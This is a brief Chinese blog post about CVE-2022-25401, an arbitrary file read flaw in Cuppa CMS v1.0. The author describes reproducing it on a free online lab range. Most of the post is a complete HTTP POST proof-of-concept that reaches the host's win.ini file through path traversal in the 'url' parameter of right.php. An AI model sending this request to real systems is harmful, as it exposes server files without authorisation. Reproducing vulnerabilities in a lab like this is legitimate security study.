CVE-2022-25401
导读:简介Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞本人使用春秋云境免费靶场在线搭建。详解github上搜到了payload,...
简介
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
本人使用春秋云境免费靶场在线搭建。
详解
github上搜到了payload,如下:
POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0;
rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;
q=0.9
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
id=1&
path=component%2Ftable_manager%2Fview%2Fcu_views&
uniqueClass=window_right_246232&
url=../../../../../../windows/win.ini声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: CVE-2022-25401
本文地址: https://pptw.com/jishu/504567.html